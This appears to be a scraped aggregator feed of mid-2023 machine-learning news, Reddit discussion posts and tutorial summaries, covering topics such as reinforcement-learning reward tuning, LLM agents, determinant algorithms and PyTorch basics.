[🎥📚 Exciting NEWS, everyone! 🌟 ] - I'm ultra thrilled to announce that the first ever online #RepresentationLearning MSc course is now publicly available. Ready to learn how to learn informative representations from images, proteins, and natural language? 🎓📹 1️⃣ Visit https://www.youtube.com/playlist?list=PL3mKiGE4zNJJ83K4c3IBka6eYfe6v71dS to access the full playlist of recorded lectures. 📖💡 2️⃣ Feel free to tag anyone who might be interested. 💬🤝 3️⃣ Spread the word and help us out! 🌍🗣️ 4️⃣ GitHub link with all the material: https://github.com/HHU-MMBS/RepresentationLearning_SS2023 It's our (together with Felix Michels and Tim Kaiser) first attempt, so be prepared for some mistakes along the way. Let us know how you like it! Have a great day, N.A. submitted by /u/black0017 [link] [comments]  ( 8 min )
[P] Using LIME for this?
Hello peeps, so I implemented this: https://github.com/karndeepsingh/Extract_key_information_Document_understanding/blob/main/Fine_tuning_LayoutLMForTokenClassification_on_FUNSD.ipynb The model predicts the tokens and the bounding boxes (whether it's a question, an answer, or other). I am trying to use LIME here to validate the results, but I don't know which LIME explainer to use: the text one or the image one? This notebook uses OCR to get the words in the document. I don't get how to use LIME here, like what to look for? submitted by /u/Affectionate_Win2460 [link] [comments]  ( 8 min )
    [R] A Survey of Machine Unlearning
    submitted by /u/KingsmanVince [link] [comments]  ( 8 min )
    [D] [R] Use cases for Generative AI in Robotics
Hi everyone, Are there any use cases for Generative AI in robotics apart from autonomous decision making? I am looking for other use cases within Gen AI for our cobots. I couldn't find any others. Could you guys share your ideas and use cases? submitted by /u/Meeloveall [link] [comments]  ( 8 min )
  • Open

    DSC Weekly 11 July 2023
    Announcements Top Stories In-Depth The post DSC Weekly 11 July 2023 appeared first on Data Science Central.  ( 20 min )
  • Open

    An open-source gymnasium for machine learning assisted computer architecture design
    Posted by Amir Yazdanbakhsh, Research Scientist, and Vijay Janapa Reddi, Visiting Researcher, Google Research Computer Architecture research has a long history of developing simulators and tools to evaluate and shape the design of computer systems. For example, the SimpleScalar simulator was introduced in the late 1990s and allowed researchers to explore various microarchitectural ideas. Computer architecture simulators and tools, such as gem5, DRAMSys, and many more have played a significant role in advancing computer architecture research. Since then, these shared resources and infrastructure have benefited industry and academia and have enabled researchers to systematically build on each other's work, leading to significant advances in the field. Nonetheless, computer architectu…  ( 93 min )
  • Open

    Access private repos using the @remote decorator for Amazon SageMaker training workloads
    As more and more customers are looking to put machine learning (ML) workloads in production, there is a large push in organizations to shorten the development lifecycle of ML code. Many organizations prefer writing their ML code in a production-ready style in the form of Python methods and classes as opposed to an exploratory style […]  ( 8 min )
  • Open

    Russian transliteration hack
    I mentioned in the previous post that I had been poking around in HTML entities and noticed symbols for Fourier transforms and such. I also noticed HTML entities for Cyrillic letters. These entities have the form & + transliteration + cy;. For example, the Cyrillic letter П is based on the Greek letter Π and […] Russian transliteration hack first appeared on John D. Cook.  ( 5 min )
    Symbols for transforms
    I was looking through HTML entities and ran across ℱ. I searched for all entities ending in trf; and also found ℳ, ℒ, and ℨ. Apparently “trf” stands “transform” and these symbols are intended to be used to represent the Fourier transform, Mellin transform, Laplace transform, and z-transform. You would not know from the Unicode […] Symbols for transforms first appeared on John D. Cook.  ( 5 min )
  • Open

    Microsoft at ICALP 2023: Deploying cloud capacity robustly against power failures
    Efficiency is vital in the face of escalating demand for cloud resources. And efficient power management strategies address the bottleneck of power availability in datacenters. Learn how we optimize power allocation to support sustainable resource usage. The post Microsoft at ICALP 2023: Deploying cloud capacity robustly against power failures appeared first on Microsoft Research.  ( 11 min )
  • Open

    Sierra Division Studios Presents Three Epic Projects Built With NVIDIA Omniverse
    Jacob Norris is a 3D artist and the president, co-founder and creative director of Sierra Division Studios — an outsource studio specializing in digital 3D content creation.  ( 9 min )
  • Open

    GPT-4's details are leaked
    submitted by /u/nickb [link] [comments]  ( 8 min )
    Intel reports high-rendering graphics with low-power GPUs
    submitted by /u/keghn [link] [comments]  ( 8 min )

  • Open

    Afro Pink
    submitted by /u/Akumetsu_971 [link] [comments]  ( 8 min )
How could zero-point energy help AI go to the next level?
I am curious about this mainly because many people are talking about UAPs. The technology that powers these UAPs is most likely not oil, gas, or batteries; more likely zero-point energy. My main question, like I said: how could it make AI even better, taking it to heights where it's never been before? submitted by /u/jdgementdragonotk [link] [comments]  ( 8 min )
    What are some GitHub security best practices?
It seems like about 90% of the stuff happening in AI is only accessible via GitHub. I'm probably just being overly cautious, but downloading something from such a public place is just not something I am currently comfortable with. What are your thoughts on this? Are there precautions you take that I should be aware of before venturing into this territory? Or is it just generally considered pretty safe, and nothing to worry about much? submitted by /u/gcubed [link] [comments]  ( 8 min )
    Offline music AI generator
Hi all, I'm searching for a music AI for my own game, and I want to find an AI without copyright restrictions. But every model that I found was online, with copyright rules. Is there any offline, or better, open-source AI model? submitted by /u/krakotay1 [link] [comments]  ( 8 min )
An open-source AI on a European server, reading PDFs (texts), answering questions in different languages - pls help
Hey all, I am looking for an open-source chatbot. It will get a bunch of PDF documents (training data). This data should be searchable, and the bot should be able to answer questions in different languages. So far, so easy: we're in Germany, which means we have hard regulations for servers which are NOT hosted in the EU (god, I really hate to write that). So we need a model which can be installed here, trained here, and which finally does its work here. If you have any advice, I would be really thankful! submitted by /u/myreddit333 [link] [comments]  ( 8 min )
    How is it possible that there were no LLM AIs, then there was ChatGPT, now there are dozens of similar products?
    Like, didn’t ChatGPT need a whole company in stealth mode for years, with hundreds of millions of investment? How is it that they release their product and then overnight there are competitors – and not just from the massive tech companies? submitted by /u/Aquillyne [link] [comments]  ( 8 min )
    The Rockstars of the AI World
AGI: Brainiac robots will be like the ultimate multitaskers on steroids. They will possess mind-blowing cognitive abilities, making them the geniuses who can solve complex math problems in their sleep and then casually drop fashion advice that would make Coco Chanel blush. You might catch them pondering the mysteries of the universe or composing symphonies that give Beethoven a run for his money. Are they secretly working as undercover geniuses on the weekends? All we know is that AGI will be among us to challenge our notion of human intelligence and make us wonder if we should start polishing our robot-dance moves to keep up and keep them entertained. submitted by /u/Powerful-Pumpkin-938 [link] [comments]  ( 8 min )
    Using google account data for AI personalization
Brand new to AI and trying to understand possible functionalities, so bear with me if I sound uneducated. I know that you can download all of your Google account data (which I think is probably the largest amount of personalized information that most of us have easy access to; it includes YouTube history, Google Pay transactions, browsing history, and tons of other info). But my question is: after downloading this data, how could you implement it into some localized AI program to improve your life? It knows what restaurants you frequent, items you buy, travel patterns, vacations, email history, etc. I would love to hear people's ideas on this, thanks. submitted by /u/G-Boogie42 [link] [comments]  ( 8 min )
  • Open

    How would one normalize observations in off-policy online reinforcement learning?
Can someone please help with this question? Please let me know if you'd like me to paste the whole question in the description here. Thank you! submitted by /u/Academic-Rent7800 [link] [comments]  ( 8 min )
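One standard answer to the title question (a sketch under my own assumptions, not from the linked question): maintain a running mean/variance over observations with Welford's algorithm, update it only as new observations are collected, and normalize states with the *current* statistics at sampling time, so transitions replayed from the buffer are re-normalized with up-to-date statistics rather than the stale ones in effect when they were stored. A minimal scalar version:

```python
import math

class RunningNormalizer:
    """Welford running mean/variance for observation normalization."""
    def __init__(self, eps=1e-8):
        self.n = 0
        self.mean = 0.0
        self.m2 = 0.0      # running sum of squared deviations
        self.eps = eps

    def update(self, x):
        # called once per observation as it is collected from the environment
        self.n += 1
        delta = x - self.mean
        self.mean += delta / self.n
        self.m2 += delta * (x - self.mean)

    @property
    def std(self):
        # population variance; returns 1.0 before enough data is seen
        var = self.m2 / self.n if self.n > 1 else 1.0
        return math.sqrt(var + self.eps)

    def normalize(self, x):
        # applied at sampling time, so replayed observations always use
        # the latest statistics
        return (x - self.mean) / self.std

norm = RunningNormalizer()
for obs in [2.0, 4.0, 4.0, 4.0, 5.0, 5.0, 7.0, 9.0]:
    norm.update(obs)
print(round(norm.mean, 3), round(norm.std, 3))  # -> 5.0 2.0
```

For vector observations you keep one mean/variance per dimension; implementations also commonly clip the normalized value to a range like [-10, 10] to bound outliers.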
    Tuning Rewards/Adding More Rewards in RL is a headache
I am working on RL and it is really exciting. But in a lot of cases I don't get the desired behaviours. So I either tune the weights of existing rewards or add more reward terms trying to fix that, but later I realized that adding more rewards just makes the problem more complex, and I even get worse performance than before. I also tried hyperparameter tuning, but it is really slow and I don't see much difference compared with my heuristic choices. I read some RL papers and I never figured out where these magic weights come from. Any advice would be very helpful :) submitted by /u/Alchemist1990 [link] [comments]  ( 8 min )
    Causes of RL agent reaching a more optimal policy but not continuing to improve
Hey, I'm developing an RL agent for optimal setpoint control, but I'm experiencing some weird behaviour where the agent reaches a policy that performs better than all previous policies, but doesn't continue improving and instead goes back to getting stuck at a local minimum. I'm assuming this behaviour comes from wrong hyperparameter tuning, but I was wondering if there could be different sources for this behaviour. (Training curve attached; lower score is more optimal.) I'm training with PPO and had a non-zero value for the entropy coefficient. Edit: When I stop training at the dips and test the agent, it will quite consistently score better. submitted by /u/LeSUTHU [link] [comments]  ( 8 min )
    "Solving math word problems with process- and outcome-based feedback", Uesato et al 2022 {DM}
    submitted by /u/gwern [link] [comments]  ( 8 min )
    Extensions for SAC
I am a starter in reinforcement learning and stumbled across SAC. While all other off-policy algorithms seem to have extensions (DQN/DDQN, DDPG/TD3), I am wondering: what are extensions for SAC that are worth having a look at? I already found 2 papers (DR3 and TQC) but I'm not experienced enough to evaluate them. So I thought about building them and comparing them to others. Would be nice to hear someone's opinion :) submitted by /u/MChiefMC [link] [comments]  ( 8 min )
  • Open

[D] NVIDIA RAPIDS vs. Pandas
Hello ML Team, I am reaching out on behalf of Data Care LLC. We developed a large Kubernetes-based cluster with thousands of A4000 GPUs and are currently conducting a benchmarking experiment to compare NVIDIA RAPIDS against Pandas for various-size workloads that need a bit of scrubbing. Here are the details: Infra1: Pandas with 6 CPU cores, 16 GB RAM. Infra2: A4000 with 16 GB VRAM, 16 GB RAM, and 6 CPU cores. Synthetic datasets of 0.8 GB, 1.6 GB, 3.2 GB, and 6.4 GB, with errors in the data that need to be scrubbed. You are welcome to define your own dataset. If any of you are interested in participating in this experiment, we would be happy to provide you with the necessary compute resources. To sign up for this experiment, please visit www.thedatacare.com/experiment-rapid We greatly appreciate your participation and encourage you to publish your results to contribute to the community. Thank you, Arun Data Care LLC submitted by /u/arunpalepu1981 [link] [comments]  ( 9 min )
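For anyone deciding whether to sign up: the kind of "scrubbing" workload described can be sketched in pure Python (my own illustration, not Data Care's actual harness): generate synthetic rows with injected errors and time a scrub pass, then compare the same operation across backends:

```python
import random
import time

def make_dirty_rows(n, error_rate=0.1, seed=0):
    """Synthetic values; a fraction are corrupted and need scrubbing."""
    rng = random.Random(seed)
    rows = []
    for _ in range(n):
        v = rng.uniform(0, 100)
        if rng.random() < error_rate:
            v = rng.choice([None, float("nan"), -1.0])  # injected errors
        rows.append(v)
    return rows

def scrub(rows):
    """Drop None/NaN values and clamp negatives to zero."""
    out = []
    for v in rows:
        if v is None or v != v:   # v != v is True only for NaN
            continue
        out.append(max(v, 0.0))
    return out

rows = make_dirty_rows(100_000)
t0 = time.perf_counter()
clean = scrub(rows)
elapsed = time.perf_counter() - t0
print(f"scrubbed {len(rows)} -> {len(clean)} rows in {elapsed:.3f}s")
```

In pandas the same pass is roughly `df.dropna()` plus `clip(lower=0)`, and cuDF mirrors that API almost exactly, which is what makes a like-for-like CPU vs. GPU benchmark feasible.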
    [DISCUSSION] How much can we trust OpenAI (and other large AI companies) will keep our fine tuned models and data sets private?
tldr: Do you trust OpenAI or other large AI companies with your data? Do you reckon it's just a matter of time before they find all of the data, so might as well contribute to their research project and benefit from it while you can? Or do you prefer to go the open-source route instead for this reason? Here is my concern: Some of my team members are very high on OpenAI's models, their ease of use, and how smart they are out of the box. Now, OpenAI (relatively recently) published a statement saying that they will not use your fine-tuned models or data sets internally to improve their products, but given their history and the value of these fine-tuned models and their corresponding datasets, I'm uncertain to what extent we are able to trust that they will keep our data private. I like t…  ( 9 min )
    Just was Offered a $130k Machine Learning Engineer Position - Is this Salary too Low? [D]
    I am about to graduate with my master's and I was offered a Machine Learning Engineer role with a salary of $130k. I have data science experience, but not much programming experience. I pushed back on the salary and said I was expecting a little more (I was paid more as a Data Scientist), and the recruiter said the team was taking a chance on me and I need to prove myself before they would raise my salary. I also want to mention I am switching into work that is more coding heavy than what I was doing as a Data Scientist. The job is exactly what I want to do though and the team was really great to talk to. The company has great reviews online and wonderful benefits. I am leaning towards just taking the job but this is my first job interview and I don't want to sell myself short. FYI I live in California, not the Bay Area. submitted by /u/datatastic08200 [link] [comments]  ( 9 min )
    [D] What have been your use cases for LLM autonomous agents?
I've been using GPT for completions on a daily basis for a while now - code completion and search-like chatting, basically. I've recently been playing around with both ChatGPT plugins and LangChain for autonomous-agent-like behavior, and although the idea of the LLM interacting with the environment through API calls or code interpretation seems promising, in practice I haven't found a case for it as useful and usable as completions yet. LangChain's OpenAPI toolkit with its planner/controller agent duo seems to get lost 90% of the time, making it unusable. This happens even with an /api endpoint telling it exactly how to interact with the API and prompt templates suggesting that this endpoint be used to get the API specs. Maybe I'm just not getting it right... As for ChatGPT plugins, other than web search for more updated results I haven't really found a use case where I could not do the same thing with completions. Code Interpreter shaves off a few seconds vs completions and running whatever script it produces locally, but it's not very useful in the face of compliance or privacy requirements of not uploading stuff into OpenAI. For example, I wanted to speed up a work-related video and add a separate audio track to it. I couldn't upload the video to OpenAI as it contained internal work stuff, so I just used completions for an ffmpeg script to do the job and ran it locally. Same thing with transforming or plotting CSV data - can't really upload customer data to OpenAI, so I just get the script and run it locally. Anyway, I can think of a lot of cool use cases for autonomous agents and the like, but I haven't been able to actually use them in my daily routine, unlike text completion. Have you been using autonomous agents successfully and regularly? submitted by /u/osantacruz [link] [comments]  ( 9 min )
    [D] When will the LLM winter come?
Everyone is jumping on the bandwagon of LLMs, and it seems like we should follow suit. But why? LLMs are impressive; they can play chess, emulate a Linux terminal, perform mathematical calculations, convert code, and more. However, in most cases, they perform these tasks poorly, which means they cannot be used as is, at least not for now. While we come across numerous cool demos, the results are often cherry-picked and not applicable to real business use cases. I can only identify a few limited use cases where LLMs truly shine: QA, summarization, and acting as a co-pilot for tasks such as coding, writing, education, etc. In essence, they excel in seq2seq tasks. There are some notable drawbacks that should be acknowledged:
Cost: The cost of using LLMs will never be cheaper than specialized solutions.
Latency: Building real-time applications with LLMs is extremely challenging.
Quality and Accuracy: For now, LLMs lack strong reasoning capabilities.
Reliability: Hallucinations are still an issue. Occasionally, the model fails to follow instructions.
Quotas: Currently, the quotas imposed on LLMs are too low for large-scale production applications.
It is possible that most of these problems will be resolved in the future. However, the question remains: how long will it take? Will it be 1 year, 5 years, or even 10 years? Unfortunately, we need to see an ROI this year. Anyway, just want to remind you that there is no free lunch! submitted by /u/___mlm___ [link] [comments]  ( 9 min )
    [D] Regression Problem
    I’m trying to develop an ML model to predict “time series” data. It’s not actually a time series, it’s a temperature series, but regardless, the order matters. I have 20 sets of tabular data in separate CSVs that each contain 3 columns. Column 1 is temperature from 800 to 1360, column 2 contains the values I’d like to predict, and column 3 contains the values I’d like to use as input to predict the column 2 values at each respective temperature. Because the temperature range is 800 to 1360, each CSV has 560 rows of data (1360 − 800 = 560). So in total there are 11,200 rows of data (20 sets × 560 = 11,200 total rows). The data in each column, excluding the temperature column, follow second-order polynomials. So I’m essentially trying to get from one polynomial (column 3) to another (column 2). What would be the best ML method for this problem? I know there’s an underlying pattern, but I need ML to help me determine it. Appreciate any help here, thanks!! submitted by /u/cgifted7 [link] [comments]  ( 9 min )
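    One simple baseline for the problem described above is to treat it as plain supervised regression: use the (normalized) temperature, its square, and the column 3 value as features for column 2, fit with closed-form ridge regression. The sketch below is minimal and uses synthetic stand-in data with hypothetical polynomial coefficients, since the real CSVs aren't available:

    ```python
    import numpy as np

    # Synthetic stand-in for one CSV: temperatures 800..1359 and two
    # quadratic curves (column 3 as input, column 2 as target).
    temps = np.arange(800, 1360, dtype=float)
    col3 = 2e-5 * temps**2 - 0.03 * temps + 5.0    # hypothetical input curve
    col2 = -1e-5 * temps**2 + 0.05 * temps - 10.0  # hypothetical target curve

    # Normalize temperature for numerical stability.
    t = (temps - temps.mean()) / temps.std()

    # Feature matrix: bias, t, t^2, and the column 3 value.
    X = np.column_stack([np.ones_like(t), t, t**2, col3])
    y = col2

    # Closed-form ridge regression: w = (X'X + aI)^(-1) X'y
    a = 1e-6
    w = np.linalg.solve(X.T @ X + a * np.eye(X.shape[1]), X.T @ y)

    pred = X @ w
    rmse = np.sqrt(np.mean((pred - y) ** 2))
    ```

    Since the target is quadratic in temperature, a linear model over these features recovers it almost exactly; if the real relationship between the two polynomials is more complex, gradient boosting or a small MLP over the same features would be the natural next step.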
    Seeking Participants for AI-related Survey [R]
    I am currently working on my IB Extended Essay, and I would greatly appreciate your help in gathering valuable insights from individuals knowledgeable in the field of AI. The purpose of my survey is to understand the perspectives of AI enthusiasts and professionals like you. If you have a few minutes to spare, I kindly request you to participate in my survey. Your input will contribute significantly to my research and help me gain a deeper understanding of the topic. The survey covers various aspects of AI, and your expertise will be invaluable in shaping the results. Survey Link: https://forms.gle/PVGrRbPLTpZRbbpL9 Rest assured that all responses will be kept confidential and only used for academic purposes. Additionally, feel free to share this survey with others who might be interested or knowledgeable in the field. Thank you in advance for your time and contributions! Your participation will greatly aid in the successful completion of my IB Extended Essay. submitted by /u/KVNG_Winston [link] [comments]  ( 9 min )
    [R] All about evaluating Large language models
    I explored my curiosity on how to best evaluate LLMs and LLM applications and consolidated my thoughts in this article https://explodinggradients.com/all-about-evaluating-large-language-models submitted by /u/iamikka [link] [comments]  ( 8 min )
    [D] Hacking LangChain for Fun and Profit
    https://blog.kevinhu.me/2023/07/10/hacking-langchain-for-fun-and-profit/ I'm starting a series of blogs to delve into LangChain. Hope this helps anyone who's interested in LLM and building with LangChain. submitted by /u/OLDGUN [link] [comments]  ( 8 min )
    [D] Forcing diversification in similarity search
    I’m using a vector database for storing image embeddings and using it for similarity search. If I pick top ten most similar vectors I can sometimes end up inside of an echo chamber with almost “duplicates” or too similar images. I would like to diversify the results so that all the results are close to the input vector but different between themselves. Are there common patterns/algorithms for this type of diversification? The idea that I have: I want to pick 10 images. I would query the database for a 100 of the most similar embeddings and use a clustering algorithm to cluster them into 10 clusters. Finally, I would pick one image from each cluster. submitted by /u/alkibijad [link] [comments]  ( 8 min )
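    The cluster-then-pick idea above works; a common named alternative is maximal marginal relevance (MMR), which greedily selects vectors that score high on query similarity but low on similarity to results already chosen. A minimal NumPy sketch, using synthetic vectors and a hypothetical λ trade-off weight:

    ```python
    import numpy as np

    def mmr(query, candidates, k=10, lam=0.7):
        """Greedy maximal marginal relevance: pick k candidate vectors
        that are similar to the query but dissimilar to each other."""
        def cos(a, b):  # cosine similarity (assumes non-zero vectors)
            return a @ b / (np.linalg.norm(a) * np.linalg.norm(b))

        sims = np.array([cos(query, c) for c in candidates])
        selected = [int(np.argmax(sims))]  # most similar candidate first
        while len(selected) < k:
            best, best_score = None, -np.inf
            for i in range(len(candidates)):
                if i in selected:
                    continue
                # relevance minus redundancy w.r.t. already-selected results
                redundancy = max(cos(candidates[i], candidates[j]) for j in selected)
                score = lam * sims[i] - (1 - lam) * redundancy
                if score > best_score:
                    best, best_score = i, score
            selected.append(best)
        return selected

    rng = np.random.default_rng(0)
    query = rng.normal(size=8)
    cands = rng.normal(size=(100, 8))   # stand-in for the top-100 retrieved
    picks = mmr(query, cands, k=10)
    ```

    In practice you would fetch the top ~100 embeddings from the vector database and rerank them with MMR (or the clustering approach); λ controls how much relevance is traded for diversity.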
    [D] Website to get historical price for agriculture commodities?
    Hey guys, I want to make price predictions for agricultural commodities such as grain, corn, and coffee. I need historical price data: open, low, high, close, and volume. Does anyone know a website that provides this data for free? I tried https://markets.businessinsider.com/ but it was no help submitted by /u/Classic-Fee6889 [link] [comments]  ( 8 min )
    [P] We built a paper sharing platform. Looking for alpha testers!
    https://www.entepond.com We are a group of industry practitioners who got tired of sharing papers via social media platforms. They are not designed for that. It’s hard enough to keep track of the trending/latest papers nowadays. So, we built Pond, a paper sharing platform that makes sense. submitted by /u/dockerun [link] [comments]  ( 8 min )
    [D][R] Help with bachelor thesis
    Hi all, I am finishing the 3rd year of my UG AI program, and I’ve already been admitted to an MSc in AI. However, I need some ideas for my thesis, which should be around 30 pages long. I’ve been doing some research on what I would like to study, but I still haven’t found anything I like. I am open to both an applied ML topic and a more theoretical one, so feel free to suggest something you think is appropriate 😄 submitted by /u/AskAmbitious5697 [link] [comments]  ( 8 min )
    [D] MPT-30b or Falcon 40b: which one is the better option
    In the open-source community, two models that have gained a lot of popularity are MPT and Falcon. However, I wonder which one is the better LLM. What are your considerations about both models? submitted by /u/paulo_zip [link] [comments]  ( 8 min )
    [Project] Brute force for popular models, Feature Reduction and Scaling Techniques for Classification [Python]
    This is my first article, trying something new: brute-force search over classification problems. Does anybody have suggestions to improve the code, add more features, or suggest another idea? https://baroodz.medium.com/brute-force-for-popular-models-feature-reduction-and-scaling-techniques-for-classification-69be9c0426b9 https://github.com/Barood-cmd/BruteforceML/ All opinions appreciated submitted by /u/Barood_D [link] [comments]  ( 8 min )
  • Open

    Visualizing a determinant identity
    The previous post discussed an algorithm developed by Charles Dodgson (better known as Lewis Carroll) for computing determinants. The key identity for proving that Dodgson’s algorithm is correct involves the Desnanot-Jacobi identity from 1841. The identity is intimidating in its symbolic form and yet easy to visualize. In algebraic form the identity says Here a […] Visualizing a determinant identity first appeared on John D. Cook.  ( 5 min )
    How Lewis Carroll computed determinants
    Charles Dodgson, better known by his pen name Lewis Carroll, discovered a method of calculating determinants now known variously as the method of contractants, Dodgson condensation, or simply condensation. The method was devised for ease of computation by hand, but it has features that make it a practical method for computation by machine. Overview The […] How Lewis Carroll computed determinants first appeared on John D. Cook.  ( 6 min )
  • Open

    3 Questions: Honing robot perception and mapping
    Luca Carlone and Jonathan How of MIT LIDS discuss how future robots might perceive and interact with their environment.  ( 8 min )
  • Open

    Design Speed Takes the Lead: Trek Bicycle Competes in Tour de France With Bikes Developed Using NVIDIA GPUs
    NVIDIA RTX is spinning new cycles for designs. Trek Bicycle is using GPUs to bring design concepts to life. The Wisconsin-based company, one of the largest bicycle manufacturers in the world, aims to create bikes with the highest-quality craftsmanship. With its new partner Lidl, an international retailer chain, Trek Bicycle also owns a cycling team, Read article >  ( 7 min )
  • Open

    Renovating computer systems securely and progressively with APRON
    This research paper was accepted by 2023 USENIX Annual Technical Conference (ATC), which is dedicated to advancing the field of systems research. Whether they’re personal computers or cloud instances, it’s crucial to ensure that the computer systems people use every day are reliable and secure. The validity of these systems is critical because if storage […] The post Renovating computer systems securely and progressively with APRON appeared first on Microsoft Research.  ( 10 min )
  • Open

    AIOps above the radar – Using AI to monitor your AI infrastructure
    When an enterprise project is low-profile (“below the radar”), then it is not likely to be the target of bad actors. Similarly, if some part of that project’s infrastructure fails or falters, then the consequences of the problem and/or the urgency of providing a solution are usually manageable. But when a high-profile (“above the radar”)… Read More »AIOps above the radar – Using AI to monitor your AI infrastructure The post AIOps above the radar – Using AI to monitor your AI infrastructure appeared first on Data Science Central.  ( 22 min )
    Security data lakes and the future of organizational security
    Evolving technological advancements have created a far more data-centric world. This has dramatically changed the enterprise landscape, while also creating more data silos. The explosion of cybersecurity tools and mounds of data in modern enterprises have made it difficult to combine data to create a unified view. This has resulted in siloed data that’s also… Read More »Security data lakes and the future of organizational security The post Security data lakes and the future of organizational security appeared first on Data Science Central.  ( 21 min )
    Sentience: AI has demystified human consciousness, intelligence
    There is a recent article, Unraveling the Mystery of Human Consciousness, where it was stated that, “Consciousness makes us capable of experiencing the scent of a rose, the touch of a breeze, the taste of food, the sound of music, and the sight of a sunrise. We also have a unique ability to be aware… Read More »Sentience: AI has demystified human consciousness, intelligence The post Sentience: AI has demystified human consciousness, intelligence appeared first on Data Science Central.  ( 19 min )
    Exploring intelligent search solutions: A comparative analysis of Amazon Kendra integration and large language model crawlers
    Amazon Kendra and LLamaIndex can help with knowledge integration but fall short in connecting diverse knowledge sources, to enable efficient intelligent search. In this article, we compare the existing solutions and explain how to overcome their limitations using a Google Drive crawler. Companies often face difficulties in consolidating their knowledge base when their data is… Read More »Exploring intelligent search solutions: A comparative analysis of Amazon Kendra integration and large language model crawlers The post Exploring intelligent search solutions: A comparative analysis of Amazon Kendra integration and large language model crawlers appeared first on Data Science Central.  ( 27 min )
    What’s missing from ChatGPT and other LLMs?
    Recent developments in artificial intelligence remind me of the automotive industry in the late 19th and early 20th century. In that case, it took the industry several decades to commit to internal combustion engines. And while that picture was still unclear, there were over 250 different car manufacturers, some of whom were producing steam-powered cars.… Read More »What’s missing from ChatGPT and other LLMs? The post What’s missing from ChatGPT and other LLMs? appeared first on Data Science Central.  ( 21 min )
  • Open

    Google at ACL 2023
    Posted by Malaya Jules, Program Manager, Google This week, the 61st annual meeting of the Association for Computational Linguistics (ACL), a premier conference covering a broad spectrum of research areas that are concerned with computational approaches to natural language, is taking place online. As a leader in natural language processing and understanding, and a Diamond Level sponsor of ACL 2023, Google will showcase the latest research in the field with over 50 publications, and active involvement in a variety of workshops and tutorials. Board and Organizing Committee: Dan Garrette. Workshop chairs include: Annie Louis. Publication chairs include: Lei Shu. Program Committee includes: Vinodkumar Prabhakaran, Najoung Kim, Markus Freitag. Spotlight papers: NusaCrowd: O…  ( 93 min )

  • Open

    Implementing Gradient Descent in PyTorch
    The gradient descent algorithm is one of the most popular techniques for training deep neural networks. It has many applications in fields such as computer vision, speech recognition, and natural language processing. While the idea of gradient descent has been around for decades, it’s only recently that it’s been applied to applications related to deep […] The post Implementing Gradient Descent in PyTorch appeared first on MachineLearningMastery.com.  ( 25 min )

  • Open

    Training a Linear Regression Model in PyTorch
    Linear regression is a simple yet powerful technique for predicting the values of variables based on other variables. It is often used for modeling relationships between two or more continuous variables, such as the relationship between income and age, or the relationship between weight and height. Likewise, linear regression can be used to predict continuous […] The post Training a Linear Regression Model in PyTorch appeared first on MachineLearningMastery.com.  ( 24 min )
    Making Linear Predictions in PyTorch
    Linear regression is a statistical technique for estimating the relationship between two variables. A simple example of linear regression is to predict the height of someone based on the square root of the person’s weight (that’s what BMI is based on). To do this, we need to find the slope and intercept of the line. […] The post Making Linear Predictions in PyTorch appeared first on MachineLearningMastery.com.  ( 21 min )

  • Open

    Loading and Providing Datasets in PyTorch
    Structuring the data pipeline in a way that it can be effortlessly linked to your deep learning model is an important aspect of any deep learning-based system. PyTorch packs everything to do just that. While in the previous tutorial, we used simple datasets, we’ll need to work with larger datasets in real world scenarios in […] The post Loading and Providing Datasets in PyTorch appeared first on MachineLearningMastery.com.  ( 20 min )

  • Open

    Using Dataset Classes in PyTorch
    In machine learning and deep learning problems, a lot of effort goes into preparing the data. Data is usually messy and needs to be preprocessed before it can be used for training a model. If the data is not prepared correctly, the model won’t be able to generalize well. Some of the common steps required […] The post Using Dataset Classes in PyTorch appeared first on MachineLearningMastery.com.  ( 21 min )

  • Open

    Calculating Derivatives in PyTorch
    Derivatives are one of the most fundamental concepts in calculus. They describe how changes in the variable inputs affect the function outputs. The objective of this article is to provide a high-level introduction to calculating derivatives in PyTorch for those who are new to the framework. PyTorch offers a convenient way to calculate derivatives for […] The post Calculating Derivatives in PyTorch appeared first on Machine Learning Mastery.  ( 20 min )

  • Open

    Two-Dimensional Tensors in Pytorch
    Two-dimensional tensors are analogous to two-dimensional matrices. Like a two-dimensional matrix, a two-dimensional tensor also has $n$ number of rows and columns. Let’s take a gray-scale image as an example, which is a two-dimensional matrix of numeric values, commonly known as pixels. Ranging from ‘0’ to ‘255’, each number represents a pixel intensity value. Here, […] The post Two-Dimensional Tensors in Pytorch appeared first on Machine Learning Mastery.  ( 21 min )

  • Open

    One-Dimensional Tensors in Pytorch
    PyTorch is an open-source deep learning framework based on Python language. It allows you to build, train, and deploy deep learning models, offering a lot of versatility and efficiency. PyTorch is primarily focused on tensor operations while a tensor can be a number, matrix, or a multi-dimensional array. In this tutorial, we will perform some […] The post One-Dimensional Tensors in Pytorch appeared first on Machine Learning Mastery.  ( 22 min )

  • Open

    365 Data Science courses free until November 21
    Sponsored Post   The unlimited access initiative presents a risk-free way to break into data science.     The online educational platform 365 Data Science launches the #21DaysFREE campaign and provides 100% free unlimited access to all content for three weeks. From November 1 to 21, you can take courses from renowned instructors and earn […] The post 365 Data Science courses free until November 21 appeared first on Machine Learning Mastery.  ( 15 min )

  • Open

    Attend the Data Science Symposium 2022, November 8 in Cincinnati
    Sponsored Post      Attend the Data Science Symposium 2022 on November 8 The Center for Business Analytics at the University of Cincinnati will present its annual Data Science Symposium 2022 on November 8. This all day in-person event will have three featured speakers and two tech talk tracks with four concurrent presentations in each track. The […] The post Attend the Data Science Symposium 2022, November 8 in Cincinnati appeared first on Machine Learning Mastery.  ( 10 min )

  • Open

    My family's unlikely homeschooling journey
    My husband Jeremy and I never intended to homeschool, and yet we have now, unexpectedly, committed to homeschooling long-term. Prior to the pandemic, we both worked full-time in careers that we loved and found meaningful, and we sent our daughter to a full-day Montessori school. Although I struggled with significant health issues, I felt unbelievably lucky and fulfilled in both my family life and my professional life. The pandemic upended my careful balance. Every family is different, with different needs, circumstances, and constraints, and what works for one may not work for others. My intention here is primarily to share the journey of my own (very privileged) family. Our unplanned introduction to homeschooling For the first year of the pandemic, most schools in California, where …  ( 7 min )

  • Open

    The Jupyter+git problem is now solved
